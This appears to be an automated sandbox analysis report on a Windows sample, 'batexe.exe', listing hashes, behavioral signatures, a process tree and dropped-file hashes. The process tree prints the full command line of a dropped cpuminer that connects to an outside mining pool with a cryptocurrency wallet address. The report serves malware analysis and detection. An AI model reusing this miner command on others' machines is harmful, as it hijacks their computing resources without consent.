Analysis
-
max time kernel
293s -
max time network
297s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
12-02-2024 15:56
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231222-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 212 b2e.exe 2492 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe 2492 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/1288-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1288 wrote to memory of 212 1288 batexe.exe 83 PID 1288 wrote to memory of 212 1288 batexe.exe 83 PID 1288 wrote to memory of 212 1288 batexe.exe 83 PID 212 wrote to memory of 1064 212 b2e.exe 85 PID 212 wrote to memory of 1064 212 b2e.exe 85 PID 212 wrote to memory of 1064 212 b2e.exe 85 PID 1064 wrote to memory of 2492 1064 cmd.exe 87 PID 1064 wrote to memory of 2492 1064 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\6DAE.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6DAE.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6DAE.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7119.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2492
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.1MB
MD52324c2fa2fae7802602bf6d5588f02d0
SHA12277ccb16327532adf5c24805d1ce6a41c2beaf7
SHA25672fd16ceb99f266d611074438d02e5bd7a791fd6233bcba12a9820abacf14b2f
SHA512dbdd8deb6e3e084770471606b9f1c84aa34ab556f3aa707f7c917a411f957432d0f8e1f060bd9fc7e1420bd3557d20720d2bf7d22fce948d696151b55158d0de
-
Filesize
1.8MB
MD57cf2871560e3527d4c7b4a9f36f86e95
SHA140723999e79192055686f16d5133c65fd5b3dce5
SHA256edc69f7b77b7d5927e8cb72dbdcb6cbd9a9db3c5cf09bf3f2f6d2e3b7b8a7612
SHA51289031dd02a11eb7bf66c8c749387ff4545fbd535556eb46ee5609a300d679cd25ea7fad09d6456b2d06d9f32e9045fa42ccaee20b3e4066c67f4bac443dc31bb
-
Filesize
2.2MB
MD5a1779b9504ebb6b09fae7b11db2142ce
SHA1e346be58864a8e1222f3edea10874c04d1598bd1
SHA256cc5c84587ec65c6d67ed9e858c4c037730af545c808c12dc35ddd52be4764de9
SHA5122182d3db053f8c7d35ffa669d5f2a3ff046809b5809bb60199545f26440dc332925f9b293206ceca8db4130c704e01472b9320d7a5e796216ad80b9eb4312da5
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
65KB
MD56db72999a484f1c2b14feccf2ce80057
SHA1605518133702f4df19e48e804811f50d8e65894e
SHA2560506789218f7716fe27c15cbb94ce31e10543b2913c27d21ab9d64ee18ddb5d6
SHA512491e89be300c3350cda12c23aa95c373df6e074b30b654046161393894407dd6284ae9d3a236fdee317a4638ceb8f28a450b0eee333991315283e4a5d847a72c
-
Filesize
155KB
MD5f121a2dcfbd90a139db7196313c4c74d
SHA16ae99c7209435b8015e8515e633fcf6f740bc97c
SHA25602c0ff910f0c5d6510c27d27814f0e50c85a2e6d58ae142c5cc9ed1c4c244877
SHA51247e8e9a205e92a1407911d7101b1fe74951ac55567eaac8a68913287f3dbb94185926949eed82a039d239c74083112eb3ce28cee68408c149e30524d261520c6
-
Filesize
157KB
MD51d83ac2af3bf7a74deca5357a2efc17f
SHA17bf4c9868059ed72f3523f1df0c5e2c3ed044f92
SHA256b4519d4d2cdf4223fab42dba1e458ad2af02d8d2995c1910d700912f2cdec29c
SHA5126e235a045f816c700fb4a6a4dd71e524891cdcc011940a1f2338015cb08fb8676fc54edc9b19e534b4c19a0f9061c3b1f513e69e26a57e372e689d9250fb5112
-
Filesize
349KB
MD5e3a4ad84cb745604cc41f82ad21286f4
SHA15f89f43457975a70c059a013326702b7e0c06b50
SHA256f6309d3daa205de90822c27b859d9740cd4c43b4ca984dc6d01598e32de77fd1
SHA512a9dd644cafef6d5df04fddd28625c255d2778dd321d15ad054d57b3513c03a787efa8c2b3bcdb3f797b0b8c3b217416797f1af9ae05aac9bd3330a8020d6da5e
-
Filesize
106KB
MD5dc6fa9c3a8a5b24c95d0fc6ad4fa2995
SHA185500cee8a573f0c3ee3c171dce92ad9a3fa2dcf
SHA256a700fc29ee1bbcef534d67d9d2866c1da12c1a276e2fc0987ccb28b11c5b6894
SHA512b0ad5ca5a6fba6cddefd0dc19b9fb8aa82e30e93c10e555aa7de0a633dff6c84a300d30b98a1405a4a583d4f8768f53db21a3c4d3b85719e8ab96fb1d2b6f186
-
Filesize
211KB
MD5c2c38e5be7b3223a017772230e7a1b03
SHA1d10034eb4b5db92a5814515ef835410a4e2fd7de
SHA2561f5045818bbe065a327ecef47a39a4b57bfbe83165ee6258e67514d440e3215a
SHA512dcfe88f687251dbad0c56f1edcd529d434beed99a2034018c7fc848abeb53dc1141e793eafc8b2d927f9152abeba7d53d5886d62d1f7260219258945eaa9bcdc
-
Filesize
102KB
MD52dbc1c502bb3460464c91d15d0250b40
SHA18c91392f1e78bd3f572079781cae1ffc14c7121f
SHA25652d6ab8bccda3eabf5a969b0a18463787119973802d4ff3301291e70a868951f
SHA51201620348236514d84a472fefc462e4b509fd92710506b57fa03867a34acb04c5fe8e25fa5023033e43811869f816e1c03bbb537eb8768330ec288d79de29b3da
-
Filesize
57KB
MD54a91d8f522a86a4a67e44a7667410a6f
SHA17ecf2598d4da2b1b105991b2f5a49c8e14e648a4
SHA2564ecdc95a5d1aac157a46642018b8ed1f005ee2ab6e9ab2bf8f38e961dc37ea4c
SHA512aa5a94d3acb4c310f0b24d132556ff07ec17bc152e4575c7e3e3d89babc9768ac0be323f3ed89c796d145b28f19a7d8d880721077b4e503a2aa3b8990032f9e3
-
Filesize
282KB
MD509d994a37e82f2cc3b81794821bdad79
SHA1abf0cdc12f4d958033e4846ba717a8c24ea6cd2a
SHA25677eee3a458569399eae94aa70db3743c0fdbf1ef50cc932a4a146d4b5174b2c2
SHA51214e8b81136e7e6c222c5188d021d3df4c670bb2dfd2f7ea84751b3882a8e0835a0b37af84f219be7426c0346e2c3944d8ccf55522716ab74783be944c1f87b04
-
Filesize
57KB
MD507b59122b40ce7a866b54f68cf5b7ceb
SHA1f95371c9234b6145bbc6ef086213c86dade22921
SHA256c97fcebe672fa8f7703e7b627d248b9b87a51d8ffeb6ac1dab72cec31106ca7d
SHA5129796f33345c001a51b49fce5319c0a0bfb144b37f26ba7d9c1e26a619c9e151667e2d67171be1afcdaf56b05d537a4999315d523fc98739c7f4766fb90acb0de
-
Filesize
289KB
MD5e113d10640285e5e5c11dafe535506dc
SHA14e043ea9fa8713fa2b9245fbd5e1020c3cfb0bba
SHA256d3faa4ed0d2aed3cc54e7e82113c30fe817292822c895b681ac70ae360ff5d98
SHA51256a5e559a6451810cbd56ec654419b8a16cdb15a9358f4f82a4ee78f680d494525fce06046851f3650e60792044a1199a513becf43a73316a8fffa42aad988fb